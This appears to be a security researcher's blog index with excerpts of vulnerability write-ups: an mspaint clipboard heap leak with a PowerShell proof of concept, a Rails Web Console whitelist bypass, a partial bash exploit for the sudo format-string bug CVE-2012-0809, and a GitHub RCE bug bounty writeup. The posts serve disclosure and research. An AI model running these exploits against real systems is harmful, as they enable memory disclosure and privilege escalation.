Paintbleed

Summary mspaint.exe does not properly verify Dib data from the clipboard. Therefore we can craft some Dib data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the Dib header itself. So the acutal image data rendered by mspaint.exe is its own heap data =) PoC Run the following code in PowerShell: $bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes)) Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.
Read more →

WebConsole IP Whitelist bypass

With the release of Ruby on Rails 4.2 the so called Web Console was introduced. As the Web Console documentation states: Web Console is built explicitly for Rails 4. By default the Web Console is available in the Rails Development Environment and allows only the IPs 127.0.0.1 and ::1 to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging. However with Rails Versions 4.1 and 4.
Read more →

CVE-2012-0809 Exploit

Original gist #!/bin/bash # CVE-2012-0809 exploit # joernchen of Phenoelit's version # Payload to be executed goes to /tmp/a (might be a shell script) cd /tmp /bin/echo '-> Clearing ENV' for i in env |cut -f1 -d "=" ;do unset $i;done /bin/echo '-> Creating symlink' /bin/ln -s /usr/bin/sudo ./%134520134x%900$n /bin/echo '-> Setting ENV' export AAA=AAAA; export A; for i in /usr/bin/seq 1 5000; do export A=$Aecho -n -e '\x24\x83\x05\x08'; done; /bin/echo '-> Now a little Brute-Force' while true ; do SUDO_ASKPASS=/tmp/a .
Read more →

GitHub RCE Writeup

Original gist GitHub RCE by Environment variable injection Bug Bounty writeup Disclaimer: I’ll keep this really short but I hope you’ll get the key points. GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast Upon git+sshing to github.com gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further in another forced SSH session to the back end where the repo actually is.
Read more →

XXE to RCE

Read more →